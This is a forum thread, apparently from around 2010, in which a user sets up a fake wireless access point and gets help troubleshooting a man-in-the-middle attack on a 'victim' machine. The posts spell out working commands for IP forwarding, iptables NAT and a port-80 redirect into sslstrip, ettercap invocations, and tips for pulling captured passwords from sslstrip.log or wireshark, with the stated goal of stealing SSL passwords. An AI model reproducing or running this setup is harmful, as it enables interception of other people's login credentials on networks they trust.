
Thread: help needed with fakeAP and man in the middle

  1. #1
    Junior Member
    Join Date
    Jun 2009
    Posts
    47

    Default help needed with fakeAP and man in the middle

    hi,

    i have a fake access point setup, it gives a dhcp address and routes through my machine running backtrack and to the internet.

    my problem is when i run ettercap the connection from the victim machine is lost

    my settings are:

    victim machine connects wireless to AP
    AP connects eth0 to Attacker
    Attacker wlan0 to internet

    i forward traffic by
    echo '1' > /proc/sys/net/ipv4/ip_forward
    iptables -X
    iptables -F
    iptables -A FORWARD -i wlan0 -o eth0 -s 192.168.1.0/24 -m state --state NEW -j ACCEPT
    iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
    iptables -A POSTROUTING -t nat -j MASQUERADE
    route del default
    route add default gw 192.168.0.1 wlan0

    at this point everything is good and the victim is on the internet

    then when i do

    sslstrip -a -k -f
    ettercap -T -q -i wlan0

    the connection from the victim to the internet is lost. i am not sure if i have to arpspoof the victim since all the traffic is coming through me anyways

    hope you can help
    thanks in advance

  2. #2
    Member
    Join Date
    Jan 2010
    Posts
    70

    Default Re: help needed with fakeAP and man in the middle

    The point of ettercap is to put yourself between the user and the gateway. Essentially, ettercap turns your machine into a "poor man's" gateway (it's a simplistic way of thinking).

    In your setup, you don't need to run ettercap. You're already the gateway. Simply set up the iptables / ebtables to locally terminate those connections which you're interested in. Running Ettercap (or arpspoof, et al.) may cause weird issues with arp / mac tables.

  3. #3
    Junior Member
    Join Date
    Jun 2009
    Posts
    47

    Default Re: help needed with fakeAP and man in the middle

    thanks for the reply

    so without running sslstrip and ettercap how would i capture ssl passwords
    Last edited by roonie; 08-29-2010 at 07:22 PM.

  4. #4
    Senior Member voidnecron's Avatar
    Join Date
    May 2010
    Posts
    132

    Default Re: help needed with fakeAP and man in the middle

    You could/should run sslstrip, otherwise you won't be able to 'read' the ssl encrypted traffic.
    And you can run ettercap without the arp poisoning.
    Otherwise you can just fire up wireshark and filter the passwords from there.
    "The difference between RAID1 and RAID0 is that the zero stands for how many files you're gonna have after a harddisk failure."

  5. #5
    Junior Member
    Join Date
    Jun 2009
    Posts
    47

    Default Re: help needed with fakeAP and man in the middle

    Quote Originally Posted by voidnecron
    You could/should run sslstrip, otherwise you won't be able to 'read' the ssl encrypted traffic.
    And you can run ettercap without the arp poisoning.
    Otherwise you can just fire up wireshark and filter the passwords from there.

    hi, i tried running sslstrip and ettercap without arp poisoning but for some reason as soon as i run ettercap it stops the connection from victim to internet.

    also how could i view https passwords in wireshark?
    Last edited by roonie; 08-29-2010 at 09:52 PM.

  6. #6
    Member
    Join Date
    Jan 2010
    Posts
    70

    Default Re: help needed with fakeAP and man in the middle

    If you look at almost any sslstrip tutorial, it basically tells you what you need to do.

    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    I suggest looking at the block diagram of iptables to learn exactly where prerouting, postrouting, etc. come into play in terms of packet modification.

  7. #7
    Junior Member
    Join Date
    Jun 2009
    Posts
    47

    Default Re: help needed with fakeAP and man in the middle

    Quote Originally Posted by orgcandman
    If you look at almost any sslstrip tutorial, it basically tells you what you need to do.

    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    I suggest looking at the block diagram of iptables to learn exactly where prerouting, postrouting, etc. come into play in terms of packet modification.

    hi, i understand all that i am using

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

    sslstrip -a -f -k -l 8080

    this works fine and would save the passwords in sslstrip.log however it is a lot to go searching through sslstrip.log

    my problem is when i run ettercap to try and see these passwords as they happen it kills the connection, can't understand why?

  8. #8
    Member
    Join Date
    Jan 2010
    Posts
    70

    Default Re: help needed with fakeAP and man in the middle

    I would guess that ettercap is messing with the iptables settings and breaking your NAT forwarding.

    Also - just use grep on the written file, or tail -f combined with grep.

  9. #9
    Junior Member
    Join Date
    Jun 2009
    Posts
    47

    Default Re: help needed with fakeAP and man in the middle

    *UPDATE*

    found the answer!

    when i run ettercap it kills the connection; found i had to run the command

    echo '1' > /proc/sys/net/ipv4/ip_forward

    again after i started ettercap. don't really understand why tho since i already did this command before. seems like ettercap is changing it

  10. #10
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default Re: help needed with fakeAP and man in the middle

    You have more than likely edited etter.conf somewhere along the line and told it to ipforward. If you open etter.conf and rehash the Linux ip forwarding lines the problem should disappear. In the meantime I have a script HERE that automates this whole process.
    Last edited by killadaninja; 08-30-2010 at 10:38 AM.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.
